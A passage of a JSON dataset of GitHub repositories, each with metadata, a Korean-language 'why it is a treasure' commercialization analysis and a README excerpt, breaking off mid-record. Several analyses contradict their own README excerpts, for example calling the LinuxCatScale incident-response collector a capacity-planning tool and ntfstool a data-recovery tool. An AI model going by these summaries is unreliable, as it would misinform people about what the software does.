\"Edge\")](https://microsoftedge.microsoft.com/addons/detail/octotree/joagmknfcgpikbadjkaikmnhpjadihjg?hl=en-US)\n[![Safari](assets/safari.png \"Safari\")](https://itunes.apple.com/us/app/octotree-pro/id1457450145?mt=12)\n[![Brave](assets/brave.png \"Brave\")](https://brave.com/learn/installing-chrome-extensions/)\n[![Opera](assets/opera.png \"Opera\")](https://addons.opera.com/en/extensions/details/octotree/)\n\n> Octotree is a __proprietary__ software. This repository contains the old source code of a very limited version of Octotree. The Octotree team owns the complete copyright over t","composite_score":0.4754,"license_safety_tag":"risky"},{"name":"offensive-security/exploit-database","github_url":"https://github.com/offensive-security/exploit-database","stars":14,"language":"","license":"GPL-2.0","abandonment_months":43,"description":"# Exploit-Database 사업화 분석\n\n## 왜 보물인가\n컴퓨터 보안 전문가들이 시스템 취약점을 찾고 방어하는 데 필요한 실제 해킹 사례 모음으로, 보안 업계에서 필수 참고 자료입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 보안 진단 SaaS 서비스**\n- 회사의 컴퓨터 시스템이 얼마나 안전한지 점검해주는 온라인 서비스로 제공\n- 월별 진단 리포트","readme_excerpt":"New repo can be found here: <https://gitlab.com/exploit-database/exploitdb>\n","composite_score":0.4753,"license_safety_tag":"restricted"},{"name":"FSecureLABS/LinuxCatScale","github_url":"https://github.com/FSecureLABS/LinuxCatScale","stars":9,"language":"Shell","license":"GPL-3.0","abandonment_months":23,"description":"# LinuxCatScale 프로젝트 분석\n\n## 왜 보물인가\n리눅스 시스템의 성능 측정과 확장성을 자동으로 분석해주는 도구로, 기업이 서버 용량 계획을 과학적으로 세울 수 있게 합니다.\n\n## 어디에 쓸 수 있나\n1. **클라우드 인프라 최적화 SaaS**: 기업의 서버 비용을 줄일 수 있는 성능 분석 서비스로 월 구독 제공\n2. **IDC/호스팅 회사 ","readme_excerpt":"# Linux-CatScale IR Collection Script \n\nLinux CatScale is a bash script that uses live of the land tools to collect extensive data from Linux based hosts. The data aims to help DFIR professionals triage and scope incidents. An Elk Stack instance also is configured to consume the output and assist the analysis process. \n\n- [Usage](#usage)\n- [Parsing](#parsing)\n- [What does it Collect](#what-does-it-collect)\n- [Disclaimer](#disclaimer)\n- [Tested OSes](#tested-oses)\n\n\n## Usage\n\nThis scripts were built to automate as much as possible. We recommend running it from an external device/usb to avoid overwriting evidence. Just in case you need a full image in future. \n\nPlease run the collection script on suspected hosts with sudo rights. fsecure_incident-response_linux_collector_0.7.sh the only file you need to run the collection. \n\n```\nuser@suspecthost:<dir>$ chmod +x ./Cat-Scale.sh\nuser@suspecthost:<dir>$ sudo ./Cat-Scale.sh \n```\n\nThe script will create a directory called \"FSecure-out\" in the ","composite_score":0.4751,"license_safety_tag":"restricted"},{"name":"i0natan/nodebestpractices","github_url":"https://github.com/i0natan/nodebestpractices","stars":9,"language":"Dockerfile","license":"CC-BY-SA-4.0","abandonment_months":14,"description":"# nodebestpractices 상용화 분석\n\n## 왜 보물인가\nNode.js라는 인기 있는 웹 개발 도구를 제대로 사용하는 방법을 모은 검증된 가이드로, 개발자들이 실수를 줄이고 품질 높은 서비스를 만드는 데 직접 도움이 됩니다.\n\n## 어디에 쓸 수 있나\n\n**1. 개발팀 온보딩 SaaS**\n신입 개발자나 팀이 올바른 코딩 관행을 빠르게 학습하는 대","readme_excerpt":"[✔]: assets/images/checkbox-small-blue.png\n\n# Node.js Best Practices\n\n<h1 align=\"center\">\n  <img src=\"assets/images/banner-2.jpg\" alt=\"Node.js Best Practices\"/>\n</h1>\n\n<br/>\n\n<div align=\"center\">\n  <img src=\"https://img.shields.io/badge/⚙%20Item%20count%20-%20102%20Best%20Practices-blue.svg\" alt=\"102 items\"/> <img id=\"last-update-badge\" src=\"https://img.shields.io/badge/%F0%9F%93%85%20Last%20update%20-%20January%2024%2C%202023-green.svg\" alt=\"Last update: January 3rd, 2024\" /> <img src=\"https://img.shields.io/badge/ %E2%9C%94%20Updated%20For%20Version%20-%20Node%2022.0.0-brightgreen.svg\" alt=\"Updated for Node 22.0.0\"/>\n</div>\n\n<br/>\n\n[<img src=\"assets/images/twitter.svg\" width=\"16\" height=\"16\" alt=\"\" />](https://twitter.com/nodepractices/) **Follow us on Twitter!** [**@nodepractices**](https://twitter.com/nodepractices/)\n\n<br/>\n\nRead in a different language: [![CN](./assets/flags/CN.png)**CN**](./README.chinese.md), [![FR](./assets/flags/FR.png)**FR**](./README.french.md), [![BR](./ass","composite_score":0.475,"license_safety_tag":"unknown"},{"name":"booknlp/booknlp","github_url":"https://github.com/booknlp/booknlp","stars":16,"language":"Python","license":"MIT","abandonment_months":22,"description":"# BookNLP 상업화 분석\n\n## 왜 보물인가\n책 속 인물, 장소, 사건을 자동으로 인식하고 정리해주는 기술로, 독서 앱이나 출판사의 콘텐츠 분석 도구로 즉시 활용 가능합니다.\n\n## 어디에 쓸 수 있나\n\n**1. 독서 관리 SaaS**\n책의 주요 등장인물, 배경 장소를 자동 추출하여 독자가 읽은 책을 더 잘 이해하고 기억하도록 돕는 구독 서비스.\n\n*","readme_excerpt":"# BookNLP\n\nBookNLP is a natural language processing pipeline that scales to books and other long documents (in English), including:\n\n* Part-of-speech tagging\n* Dependency parsing\n* Entity recognition\n* Character name clustering (e.g., \"Tom\", \"Tom Sawyer\", \"Mr. Sawyer\", \"Thomas Sawyer\" -> TOM_SAWYER) and coreference resolution\n* Quotation speaker identification\n* Supersense tagging (e.g., \"animal\", \"artifact\", \"body\", \"cognition\", etc.)\n* Event tagging\n* Referential gender inference (TOM_SAWYER -> he/him/his)\n\nBookNLP ships with two models, both with identical architectures but different underlying BERT sizes.  The larger and more accurate `big` model is fit for GPUs and multi-core computers; the faster `small` model is more appropriate for personal computers.  See the table below for a comparison of the difference, both in terms of overall speed and in accuracy for the tasks that BookNLP performs.\n\n\n| |Small|Big|\n|---|---|---|\nEntity tagging (F1)|88.2|90.0|\nSupersense tagging (F1)|73.2","composite_score":0.4745,"license_safety_tag":"safe"},{"name":"Malajab/incyber","github_url":"https://github.com/Malajab/incyber","stars":5,"language":"Python","license":"unknown","abandonment_months":23,"description":"# Malajab/incyber 저장소 분석\n\n## 왜 보물인가\n정확한 프로젝트 설명이 부족하여 가치 평가가 제한적이나, 사이버 보안 관련 프로젝트로 보이며 최근(2024년 6월)까지 활발히 유지되고 있습니다.\n\n## 어디에 쓸 수 있나\n1. **보안 점검 SaaS**: 기업의 IT 시스템 취약점을 자동으로 검사해주는 월간 구독 서비스\n2. **기업 내부 ","readme_excerpt":"<h2 dir='rtl' align='right'>مجتمع InCyber</h2>\n<img align=\"right\" width=\"300\" height=\"300\" src=\"https://user-images.githubusercontent.com/61029571/88852176-929acd00-d1f6-11ea-9fa3-b517dbc6d40c.png\">\n<h3 dir='rtl' align='right'>إخلاء المسؤولية</h3>\n\n> <p dir='rtl' align='right'>إن الأدوات والطرق المذكورة هنا هي للتعلّم والإستفادة  في مجال اختبار الإختراق أو في مجال اصطياد الثغرات لذلك عليك استخدامها بالشكل الصحيح والقانوني.</p>\n<h3 dir='rtl' align='right'>مقدمة</h3>\n\n> <p dir='rtl' align='right'> الكثير من الراغبين في الدخول في مجال اختبار الاختراق PT أو مجال اصطياد الثغرات BugBounty يتسائلون كيف هي البداية؟ وكيف أقوم بعملية اختبار الاختراق؟.وكيف أقوم باصطياد الثغرات والإبلاغِ عنها والحصول على مكافأة؟. ولا شك أن هناك الكثير من المصادر المتوفرة على الإنترنت وبشكل مجاني. لذلك قمت بجمعها هنا كي يسهل عليك التعلم والاستفادة منها بالشكل الصحيح.وأنا على ثقة أن هناك أدوات كثيرة قد لا أستطيع حصرها إلا بتعاونكم لذلك إذا وجدت أي منها وترغب باضافتها فضلًا قم بالتواصل معي.</p>\n<h4 dir='rtl' align='r","composite_score":0.4741,"license_safety_tag":"unknown"},{"name":"shadowsocksr-backup/shadowsocksr-csharp","github_url":"https://github.com/shadowsocksr-backup/shadowsocksr-csharp","stars":5,"language":"C#","license":"GPL-3.0","abandonment_months":87,"description":"# shadowsocksr-csharp 자산 분석\n\n## 왜 보물인가\n인터넷 접속을 암호화하여 보호하는 기술로, 개인정보 유출 방지와 인터넷 자유를 원하는 사용자들이 꾸준히 찾는 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **VPN/프록시 서비스 SaaS**: 월 구독 기반으로 안전한 인터넷 사용 서비스 제공\n2. **기업 내부 네트워크 보안 도구**:","readme_excerpt":"ShadowsocksR for Windows\n=======================\n\n[![Build Status]][Appveyor]\n\n#### Download\n\nYou will need to download and install [7-Zip](http://www.7-zip.org/) in order \nto extract the ShadowsocksR archive.\n\nDownload the [latest release] for ShadowsocksR for Windows.\n\n_Optionally_, right-click on the downloaded 7z file and select \n**CRC SHA** > **SHA-256**. Verify that the SHA-256 checksum displayed \nmatches the expected checksum which was shown on the releases page.\n\nRight-click on the downloaded 7z file and do **7-Zip** > **Extract Here** \nor extract to a new folder.\n\n_Optionally_, download and install [Gpg4win](https://www.gpg4win.org/). \nFrom the Windows start menu, launch program **Kleopatra**. \nDo **File** > **New Certificate** to create a personal OpenPGP key pair. \nSave the signing key from\n[breakwa11/pubkey](https://github.com/breakwa11/pubkey) as a text file. \nThen do **File** > **Import Certificates** to import the signing key text file.\nAfter import, select the signing k","composite_score":0.4735,"license_safety_tag":"restricted"},{"name":"wight-airmash/ab-server","github_url":"https://github.com/wight-airmash/ab-server","stars":7,"language":"TypeScript","license":"MIT","abandonment_months":16,"description":"# ab-server 보물 분석 보고서\n\n## 왜 보물인가\n온라인 멀티플레이 게임의 실시간 서버 운영을 간단하게 만들어주는 오픈소스 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 게임 개발사를 위한 \"게임 서버 호스팅 플랫폼\" 구독 상품으로 제공\n2. **내부 업무 도구**: 게임 스튜디오의 자체 멀티플레이 게임 개발 시 기본 인프라","readme_excerpt":"# ab-server\n\nGame server.\n\nDocs:\n\n- [In-game commands](./docs/commands.md).\n- [Environment variables](./docs/env-variables.md).\n- [JSON API](./docs/api.md).\n- [Synchronization of shared data between game servers](./docs/sync.md).\n- [Aircrafts damage](./docs/damage.md).\n- [CTF mode Q-bots](./docs/ctf-bots.md) (not a server part).\n\n## Installation\n\nRequirements:\n\n- Node.js 12.\n- uWebSockets.js is C++ lib and distributed in binary files for the most popular operation systems, so it is unlikely, but you may have to compile it from source if you use an unpopular OS.\n\nDevelopment:\n\n```sh\nnpm i\ncp .env.example .env\n```\n\nSet `SU_PASSWORD` variable value.\n\nBuild\n\n```sh\nnpm run build:dev\n```\n\nor watch\n\n```sh\nnpm run watch\n```\n\nAnd start\n\n```sh\nnpm run start\n```\n\n## Settings\n\nAvailable [environment variables](./docs/env-variables.md).\n\n## User accounts\n\nUser accounts data are stored in `./data/user-stats.json` and in memory during the server run. Set `USER_ACCOUNTS` to `false` to turn user accoun","composite_score":0.4733,"license_safety_tag":"safe"},{"name":"luka1199/geo-heatmap","github_url":"https://github.com/luka1199/geo-heatmap","stars":73,"language":"Python","license":"MIT","abandonment_months":22,"description":"","readme_excerpt":"# Geo Heatmap\n\n<p align=\"center\"><img src=\"https://user-images.githubusercontent.com/45404400/63515170-7a9cd280-c4ea-11e9-8875-e693622ac26e.png\" alt=\"screenshot\" width=\"400\"></p>\n\nThis is a script that generates an interactive geo heatmap from your Google location history data using Python, Folium and OpenStreetMap.\n\n## Getting Started\n\n### 1. Install Python 3+\n\nIf you don't already have Python 3+ installed, grab it from <https://www.python.org/downloads/>. You'll want to download install the latest version of **Python 3.x**. As of 2019-11-22, that is Version 3.8.\n\n### 2. Get Your Location Data\n\nHere you can find out how to download your Google data: <https://support.google.com/accounts/answer/3024190?hl=en></br>\nHere you can download all of the data that Google has stored on you: <https://takeout.google.com/>\n\nTo use this script, you only need to select and download your \"Location History\", which Google will provide to you as a JSON file by default.  KML is also an output option and i","composite_score":0.4733,"license_safety_tag":"safe"},{"name":"yueyi2019/online-taxi","github_url":"https://github.com/yueyi2019/online-taxi","stars":7,"language":"Java","license":"unknown","abandonment_months":22,"description":"# yueyi2019/online-taxi 프로젝트 분석\n\n## 왜 보물인가\n택시 예약 앱의 핵심 기술을 완성된 코드로 제공하므로, 처음부터 새로 만들지 않고도 이동 서비스 사업을 빠르게 시작할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **지역 택시 호출 플랫폼**: 특정 도시나 지역의 택시 예약 서비스를 론칭하는 스타트업의 기반 기술로 활용\n2. ","readme_excerpt":"# online-taxi\n网约车项目\n\n# 各个服务端口分配\n\n## api层：\n\n乘客（api-passenger）：9001\n\n## service层\n\n验证码服务（service-verification-code）：8001\n\n乘客用户服务（service-passenger-user）：8002\n\napp更新服务（service-app-update）：8003\n\n订单服务（service-order）：8004\n\n订单派单服务（service-order-dispatch）：8005\n\n钱包服务（service-wallet）：8006\n\n短信服务（service-sms）：8007\n\n网关（online-taxi-gateway）：9000\n\n","composite_score":0.4728,"license_safety_tag":"unknown"},{"name":"MichalStrehovsky/zerosharp","github_url":"https://github.com/MichalStrehovsky/zerosharp","stars":162,"language":"C#","license":"unknown","abandonment_months":23,"description":"# ZeroSharp 분석 보고서\n\n## 왜 보물인가\n기존 프로그래밍 언어 없이 매우 빠르고 가벼운 소프트웨어를 만들 수 있는 새로운 기술로, 컴퓨터 성능이 제한된 환경에서 혁신적인 솔루션을 제공할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. IoT 기기 관리 SaaS**\n스마트홈, 산업용 센서 등 저사양 기기들을 효율적으로 제어하는 클라우드 서비스","readme_excerpt":"# C# for systems programming\n\nThese samples show how to compile C# to native code using the .NET Native AOT technology ([NativeAOT](https://github.com/dotnet/runtimelab/tree/feature/NativeAOT), also known as CoreRT previously).\n\nThe samples are for people who would like to use C#, but don't want to be bound by the choices of the base class libraries that normally come with C# (in the form that it's bundled in .NET). If you just want to native compile your .NET apps, go to the [NativeAOT](https://github.com/dotnet/runtimelab/tree/feature/NativeAOT) repo/branch instead. Nothing to see for you in this repo.\n\n`no-runtime` is a rather pointless sample that demonstrates how to write code in C# that is directly runnable without a runtime. C# has value types and you can p/invoke into an unmanaged memory allocator, so you can do things with this, but you're so severily limited it's rather pointless. But Hello world ends up being about 8 kB native EXE with no dependencies, so that's rather cool.","composite_score":0.4726,"license_safety_tag":"unknown"},{"name":"giswqs/python-geospatial","github_url":"https://github.com/giswqs/python-geospatial","stars":11,"language":"Shell","license":"MIT","abandonment_months":23,"description":"# python-geospatial 분석 리포트\n\n## 왜 보물인가\n지도와 위치 정보를 다루는 지리정보 분석을 누구나 쉽게 할 수 있도록 만든 도구 모음입니다.\n\n## 어디에 쓸 수 있나\n\n1. **부동산 데이터 분석 SaaS**: 토지 면적 계산, 지역 특성 분석 등을 자동화하여 중개소나 건설사에 월 구독 서비스로 제공\n2. **물류 회사 내부 도구**:","readme_excerpt":"# python-geospatial\n\nA collection of Python packages for geospatial analysis with binder-ready notebook examples. Launch the interactive notebook tutorials with **mybinder.org** or **binder.pangeo.io** test all the pre-installed Python pakcages for geospatial analysis.\n\n[![Binder](https://mybinder.org/badge_logo.svg)](https://mybinder.org/v2/gh/giswqs/python-geospatial/master)\n[![Pangeo](http://binder.pangeo.io/badge.svg)](http://binder.pangeo.io/v2/gh/giswqs/python-geospatial/master)\n[![MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT)\n\n\nAuthor: Qiusheng Wu (https://wetlands.io)\n\n## Installation\n\nIt is highly recommended that you use the [conda](https://conda.io/docs/index.html) package manager to install all the requirements. You can either install [Miniconda](https://conda.io/miniconda.html) or the (larger) [Anaconda](https://www.anaconda.com/download/) distribution. It is also recommended that you install [git](https://git-scm.com/downl","composite_score":0.4723,"license_safety_tag":"safe"},{"name":"kkkgo/LTSC-Add-MicrosoftStore","github_url":"https://github.com/kkkgo/LTSC-Add-MicrosoftStore","stars":5,"language":"Batchfile","license":"unknown","abandonment_months":22,"description":"# LTSC-Add-MicrosoftStore 평가 분석\n\n## 왜 보물인가\nWindows 10/11의 기업용 장기지원 버전(LTSC)에 Microsoft Store를 추가하는 도구로, 폐쇄된 기업 환경에서도 앱 설치 자유도를 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **내부 업무 도구**: 기업의 IT 부서가 직원 PC에 필수 앱을 자동으로 설치","readme_excerpt":"# Add Store to Windows 10 Enterprise LTSC  \nFor Windows 10 Enterprise LTSC 2019   \n[Download](https://github.com/lixuy/LTSC-Add-MicrosoftStore/archive/2019.zip)  \n## To install, run Add-Store.cmd as Administrator  \nIf you do not want App Installer / Purchase App / Xbox identity, delete each one appxbundle before running to install. However, if you plan on installing games or any app with in-purchase options, you should include everything.  \nIf the store still will not function, reboot. If still not working, open the command prompt as the administrator and run the following command, then reboot once more.  \n```PowerShell -ExecutionPolicy Unrestricted -Command \"& {$manifest = (Get-AppxPackage Microsoft.WindowsStore).InstallLocation + '\\AppxManifest.xml' ; Add-AppxPackage -DisableDevelopmentMode -Register $manifest}\"```    \n## Addition troubleshooting    \n>Right click start  \nSelect Run  \nType in: WSReset.exe  \nThis will clear the cache if needed.  \n  \n# 为Windows 10 Enterprise LTSC增加应用商店 ","composite_score":0.4722,"license_safety_tag":"unknown"},{"name":"vuejs-templates/webpack","github_url":"https://github.com/vuejs-templates/webpack","stars":14,"language":"JavaScript","license":"mit","abandonment_months":39,"description":"# vuejs-templates/webpack 상업화 분석\n\n## 왜 보물인가\n웹사이트나 앱을 만드는 데 필요한 기본 틀(템플릿)을 제공하여 개발 시간을 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 웹 기반 프로젝트 관리 도구나 협업 플랫폼의 개발 기반으로 제공하여 고객의 구축 시간 단축\n2. **내부 업무 도구**: 기","readme_excerpt":"# vue-webpack-boilerplate\n\n> A full-featured Webpack setup with hot-reload, lint-on-save, unit testing & css extraction.\n\n> This template is Vue 2.0 compatible. For Vue 1.x use this command: `vue init webpack#1.0 my-project`\n\n\n# Vue-cli 3 is here, so this template is now considered deprecated.\n\nThis template was the main template for vue-cli verison 2.*.\n\nNow that we have released a [stable version of vue-cli 3](https://cli.vuejs.org), which incorporates all features that this template offers (and much more), we think that this template doesn't have any significant use for the future, so we won't put much resource in developing it further.\n\nWe will try and fix major issues should they arise, but not much more.\n\nFeel free to fork this template if you want to keep it alive.\n\n## Documentation\n\n- [For this template](http://vuejs-templates.github.io/webpack): common questions specific to this template are answered and each part is described in greater detail\n- [For Vue 2.0](http://vuejs.org","composite_score":0.4722,"license_safety_tag":"safe"},{"name":"Kaiyiwing/qwerty-learner-vscode","github_url":"https://github.com/Kaiyiwing/qwerty-learner-vscode","stars":7,"language":"TypeScript","license":"MIT","abandonment_months":23,"description":"# Kaiyiwing/qwerty-learner-vscode 분석\n\n## 왜 보물인가\n영어 단어 학습을 게임처럼 즐기면서 동시에 프로그래밍 코드까지 배울 수 있는 VS Code 확장 프로그램으로, 개발자와 영어 학습자 모두에게 유용합니다.\n\n## 어디에 쓸 수 있나\n\n**1. 온라인 영어 학습 플랫폼**\n프로그래밍 교육 커뮤니티나 개발자 교육 회사에서 이 ","readme_excerpt":"<div align=center>\n<img  src=\"docs/logo.png\" width=\"200px\"/>\n</div>\n\n<h1 align=\"center\">\n Qwerty Learner VSCode\n</h1>\n\n<p align=\"center\">\n  为键盘工作者设计的单词记忆与英语肌肉记忆锻炼软件  VSCode 摸🐟版\n</p>\n<p align=\"center\">\n  <a href=\"https://github.com/Kaiyiwing/qwerty-learner-vscode/blob/master/LICENSE\"><img src=\"https://img.shields.io/github/license/KaiyiWing/qwerty-learner-vscode\" alt=\"License\"></a>\n  <a><img src=\"https://img.shields.io/badge/PRs-welcome-brightgreen.svg\"/></a>\n  <a><img src=\"https://img.shields.io/badge/Powered%20by-VSCode-blue\"/></a>\n</p>\n\n<div align=center>\n<img  src=\"docs/Screenshot.png\"/>\n</div>\n\n## 💡 演示\n\n<div align=center>\n<img  src=\"docs/typing.gif\"/>\n</div>\n\n## 📸 安装\n\n[VSCode Plugin Market](https://marketplace.visualstudio.com/items?itemName=Kaiyi.qwerty-learner)\n\n<br/>\n\n本项目为 [Qwerty Learner](https://github.com/Kaiyiwing/qwerty-learner) 的 VSCode 插件版本，访问原始项目获得更好的体验。\n\n## ✨ 实现原理\n\n因为 VSC 没有提供对 Keypress 的回调，所以实现上使用了较为取巧的方式，监听用户当前输入文档的改变，然后删除用户输入。 用户可以在任意代码、文档页面开启软件进行英语打字练习，插件会自动删除用户输入的文","composite_score":0.4708,"license_safety_tag":"safe"},{"name":"MaximAbramchuck/awesome-interview-questions","github_url":"https://github.com/MaximAbramchuck/awesome-interview-questions","stars":19,"language":"","license":"unknown","abandonment_months":22,"description":"","readme_excerpt":"<div align=\"center\">\t\n\t<p>\t\n\t\t<a href=\"https://doppler.com?utm_campaign=github_repo&utm_medium=referral&utm_content=awesome-interview&utm_source=github\">\t\n      <div>\t\n\t\t\t\t<img src=\"https://dashboard.doppler.com/imgs/logo-long.svg\" width=\"260\"  alt=\"Doppler\">\t\n\t\t\t</div>\t\n      <br>\n\t\t\t<b>All your environment variables, in one place</b>\t\n\t\t\t<div>Stop struggling with scattered API keys, hacking together home-brewed tools,</div>\n\t\t\t<div>and avoiding access controls. Keep your team and servers in sync with Doppler.</div>\n\t\t\t</br>\n\t\t</a>\t\n\t</p>\t\n</div>\t\n\n# Awesome Interviews [![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/sindresorhus/awesome)\n\nThis project is no longer actively supported.\n\n> A curated list of lists of technical interview questions.\n\n[What makes for an awesome list?](awesome.md)\n\nPlease read the [contribution guidelines](contributing.md) or [creating a list guide](create-list.md) if you wa","composite_score":0.4704,"license_safety_tag":"unknown"},{"name":"ntfstool/ntfstool","github_url":"https://github.com/ntfstool/ntfstool","stars":5,"language":"JavaScript","license":"MIT","abandonment_months":23,"description":"# ntfstool 상용화 분석 보고서\n\n## 왜 보물인가\nWindows 파일 시스템의 손상된 데이터를 복구하는 도구로, 개인과 기업의 중요한 파일 손실 문제를 직접 해결할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 기반 파일 복구 플랫폼 (사용자가 손상된 드라이브를 업로드하면 자동 복구)\n2. **내부 업무 도구**:","readme_excerpt":"# NTFS Tool\n# Support apple chip M1/M2/M3  2024 Start...\n\n<a href=\"https://ntfstool.com\">\n  <img src=\"https://github.com/ntfstool/ntfstool/blob/1.0.2/static/github/256x256@2x.png?raw=true\" /></a>\n\nEnglish | [简体中文](./README-CN.md)\n\n## A free software that provides NTFS read and write support for Apple computers\n## NTFS Tool Free For Mac\n\nWe are a group of software technology practitioners who love life and love programming. Using scattered time, we have developed this free NTFS Tool for Mac tool.\n\nNTFS Tool is a pure version of NTFS tool that supports NTFS disk read-write, mount, launch, management and other functions. Its interface is simple and easy to use. I hope this tool will bring convenience to your work and life.\n\nIf this software is helpful to you, welcome Star's attention.\n\n\n✈️ [Official Website](https://ntfstool.com) | 📖 [Manual](http://docs.ntfstool.com)\n\n## 💽 Installation\nDownload from [GitHub Releases](https://github.com/ntfstool/ntfstool/releases) and install it.\n\n### Pla","composite_score":0.4704,"license_safety_tag":"safe"},{"name":"textmate/textmate","github_url":"https://github.com/textmate/textmate","stars":5,"language":"Objective-C++","license":"GPL-3.0","abandonment_months":25,"description":"# TextMate 저장소 분석\n\n## 왜 보물인가\nTextMate는 프로그래머들이 코드를 쉽게 작성하고 편집할 수 있게 도와주는 전문 도구로, 20년 이상 개발되어온 검증된 소프트웨어입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 클라우드 기반 코딩 교육 플랫폼**\nTextMate의 경량 편집 기능을 웹 버전으로 만들어 초보자 프로그래밍 ","readme_excerpt":"# TextMate\n\n## Download\n\nYou can [download TextMate from here](https://macromates.com/download).\n\n## Feedback\n\nYou can use [the TextMate mailing list](https://lists.macromates.com/listinfo/textmate) or [#textmate][] IRC channel on [freenode.net][] for questions, comments, and bug reports.\n\nYou can also [contact MacroMates](https://macromates.com/support).\n\nBefore you submit a bug report please read the [writing bug reports](https://github.com/textmate/textmate/wiki/writing-bug-reports) instructions.\n\n## Screenshot\n\n![textmate](https://raw.github.com/textmate/textmate/gh-pages/images/screenshot.png)\n\n# Building\n\n## Setup\n\nTo build TextMate, you need the following:\n\n * [boost][]            — portable C++ source libraries\n * [Cap’n Proto][capnp] — serialization library\n * [multimarkdown][]    — marked-up plain text compiler\n * [ninja][]            — build system similar to `make`\n * [ragel][]            — state machine compiler\n * [sparsehash][]       — a cache friendly `hash_map`\n\nAll th","composite_score":0.4701,"license_safety_tag":"restricted"},{"name":"mli/gluon-tutorials-zh","github_url":"https://github.com/mli/gluon-tutorials-zh","stars":7,"language":"Python","license":"apache-2.0","abandonment_months":22,"description":"# mli/gluon-tutorials-zh 가치평가\n\n## 왜 보물인가\n인공지능을 배우고 싶은 사람들을 위해 중국어로 쉽게 설명한 학습 자료 모음이라 누구나 접근하기 쉽습니다.\n\n## 어디에 쓸 수 있나\n\n1. **온라인 교육 플랫폼**: 중국·대만·싱가포르 등 중국어권 사용자를 위한 인공지능 학습 강좌 개발\n2. **기업 직원 교육 서비스**: 회사의 ","readme_excerpt":"# 动手学深度学习（Dive into Deep Learning，D2L.ai）\n\n[第二版：zh.D2L.ai](https://zh.d2l.ai)  | [第一版：zh-v1.D2L.ai](https://zh-v1.d2l.ai/) |  安装和使用书中源代码： [第二版](https://zh.d2l.ai/chapter_installation/index.html) [第一版](https://zh-v1.d2l.ai/chapter_prerequisite/install.html)\n\n<h5 align=\"center\"><i>理解深度学习的最佳方法是学以致用。</i></h5>\n\n<p align=\"center\">\n  <img width=\"200\"  src=\"static/frontpage/_images/eq.jpg\">\n  <img width=\"200\"  src=\"static/frontpage/_images/figure.jpg\">\n  <img width=\"200\"  src=\"static/frontpage/_images/code.jpg\">\n  <img width=\"200\"  src=\"static/frontpage/_images/notebook.gif\">\n</p>\n\n本开源项目代表了我们的一种尝试：我们将教给读者概念、背景知识和代码；我们将在同一个地方阐述剖析问题所需的批判性思维、解决问题所需的数学知识，以及实现解决方案所需的工程技能。\n\n我们的目标是创建一个为实现以下目标的统一资源：\n1. 所有人均可在网上免费获取；\n1. 提供足够的技术深度，从而帮助读者实际成为深度学习应用科学家：既理解数学原理，又能够实现并不断改进方法；\n1. 包含可运行的代码，为读者展示如何在实际中解决问题。这样不仅直接将数学公式对应成实际代码，而且可以修改代码、观察结果并及时获取经验；\n1. 允许我们和整个社区不断快速迭代内容，从而紧跟仍在高速发展的深度学习领域；\n1. 由包含有关技术细节问答的论坛作为补充，使大家可以相互答疑并交换经验。\n\n<h5 align=\"center\">将本书（中英文版）用作教材或参考书的大学</h5>\n<p align=\"center\">\n  <img width=\"400\"  src","composite_score":0.47,"license_safety_tag":"safe"},{"name":"daneden/animate.css","github_url":"https://github.com/daneden/animate.css","stars":22,"language":"CSS","license":"mit","abandonment_months":22,"description":"","readme_excerpt":"# Animate.css\n\n[![GitHub Version](https://img.shields.io/github/release/animate-css/animate.css.svg?style=for-the-badge)](https://github.com/animate-css/animate.css/releases) [![Github Star](https://img.shields.io/github/stars/animate-css/animate.css.svg?style=for-the-badge)](https://github.com/animate-css/animate.css/stargazers) [![Github Fork](https://img.shields.io/github/forks/animate-css/animate.css.svg?style=for-the-badge)](https://github.com/animate-css/animate.css/network/members) [![License](https://img.shields.io/badge/license-hippocratic%20license-orange.svg?longCache=true&style=for-the-badge)](https://github.com/animate-css/animate.css/blob/main/LICENSE)\n\n> If you need the old docs - v3.x.x and under - you can find it [here](https://github.com/animate-css/animate.css/tree/a8d92e585b1b302f7749809c3308d5e381f9cb17).\n\n## _Just-add-water CSS animation_\n\n## Installation\n\nInstall with npm:\n\n```shell\nnpm install animate.css --save\n```\n\nInstall with yarn:\n\n```shell\nyarn add animate","composite_score":0.47,"license_safety_tag":"safe"},{"name":"Microsoft/CNTK","github_url":"https://github.com/Microsoft/CNTK","stars":15,"language":"C++","license":"NOASSERTION","abandonment_months":39,"description":"# Microsoft CNTK 분석 보고서\n\n## 왜 보물인가\n마이크로소프트가 만든 AI 학습 도구로, 컴퓨터가 데이터를 보고 스스로 판단하는 능력을 쉽게 개발할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업의 문서 인식 시스템(영수증, 계약서 자동 분석) 구독 서비스\n2. **내부 업무 도구**: 은행의 대출 심사 자동","readme_excerpt":"## CNTK\n\n| **Chat** | **Windows build status** | **Linux build status** |\n|-------------|-------------|---------------|\n| [![Join the chat at https://gitter.im/Microsoft/CNTK](https://badges.gitter.im/Microsoft/CNTK.svg)](https://gitter.im/Microsoft/CNTK?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge) | [![Build Status](https://aiinfra.visualstudio.com/_apis/public/build/definitions/a95b3960-90bb-440b-bd18-d3ec5d1cf8c3/126/badge)](https://cntk.ai/nightly-windows.html) | [![Build Status](https://aiinfra.visualstudio.com/_apis/public/build/definitions/a95b3960-90bb-440b-bd18-d3ec5d1cf8c3/127/badge)](https://cntk.ai/nightly-linux.html) |\n\nThe Microsoft Cognitive Toolkit (https://cntk.ai) is a unified deep learning toolkit that describes neural networks as a series of computational steps via a directed graph. In this directed graph, leaf nodes represent input values or network parameters, while other nodes represent matrix operations upon their inputs. CNTK allow","composite_score":0.4696,"license_safety_tag":"unknown"},{"name":"zuramai/starback.js","github_url":"https://github.com/zuramai/starback.js","stars":5,"language":"TypeScript","license":"unknown","abandonment_months":23,"description":"# 